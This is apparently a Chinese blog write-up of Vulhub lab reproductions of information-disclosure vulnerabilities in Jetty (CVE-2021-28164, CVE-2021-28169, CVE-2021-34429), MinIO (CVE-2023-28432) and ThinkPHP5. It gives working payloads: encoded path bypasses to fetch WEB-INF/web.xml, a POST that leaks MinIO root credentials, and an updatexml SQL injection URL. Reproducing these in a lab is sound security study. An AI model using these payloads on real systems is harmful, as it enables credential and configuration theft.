Vulhub-信息泄露

1.Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)

docker-compose up -d 启动环境,显示8080端口被占用

修改 docker-compose.yml 中的映射端口

Vulhub-信息泄露_第1张图片

curl 访问 http://192.168.48.129:8090/WEB-INF/web.xml

显示404:

Vulhub-信息泄露_第2张图片

Vulhub-信息泄露_第3张图片

通过 %2e 绕过

curl -v 'http://192.168.48.129:8090/%2e/WEB-INF/web.xml'
Vulhub-信息泄露_第4张图片
2. Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞(CVE-2021-28169)

环境启动后,访问http://your-ip:8080即可查看到一个example页面。该页面使用到了ConcatServlet来优化静态文件的加载:

Vulhub-信息泄露_第5张图片


 漏洞利用

正常通过/static?/WEB-INF/web.xml无法访问到敏感文件web.xml:

Vulhub-信息泄露_第6张图片

对字母W进行双URL编码(%2557),即可绕过限制访问web.xml:

Vulhub-信息泄露_第7张图片
3.Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-34429)

Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

Jetty在9.4.40后修复了因为%2e导致的敏感信息泄露漏洞CVE-2021-28164,但这个修复是不完全的,通过下面三种方式可以进行绕过:

  • unicode形式URL编码:/%u002e/WEB-INF/web.xml
  • \0组合.导致的绕过:/.%00/WEB-INF/web.xml
  • \0组合..导致的绕过:/a/b/..%00/WEB-INF/web.xml

影响版本:9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5

漏洞复现:

直接访问/WEB-INF/web.xml将会返回404页面:

Vulhub-信息泄露_第8张图片

使用/%u002e/WEB-INF/web.xml来绕过限制下载web.xml:

Vulhub-信息泄露_第9张图片

Vulhub-信息泄露_第10张图片
 

4.MinIO集群模式信息泄露漏洞 (CVE-2023-28432)

执行如下命令启动一个MinIO集群,其中包含3个以集群模式运行的服务:

docker compose up -d

集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。

漏洞复现

这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,发送如下数据包即可查看泄露的环境变量:

(抓包 http://your-ip:9000/minio/bootstrap/v1/verify)修改 请求头GET 为 POST

Vulhub-信息泄露_第11张图片

Vulhub-信息泄露_第12张图片

可见,其中包含MINIO_SECRET_KEYMINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台:

Vulhub-信息泄露_第13张图片

Vulhub-信息泄露_第14张图片

5.ThinkPHP5 SQL注入漏洞/信息泄露

启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。

Vulhub-信息泄露_第15张图片

访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

Vulhub-信息泄露_第16张图片

通过DEBUG页面,我们找到了数据库的账号、密码 

这又属于一个敏感信息泄露漏洞。

Vulhub-信息泄露_第17张图片

Vulhub-信息泄露_第18张图片

Vulhub-信息泄露_第19张图片

你可能感兴趣的:(vulhub漏洞复现,网络安全,安全)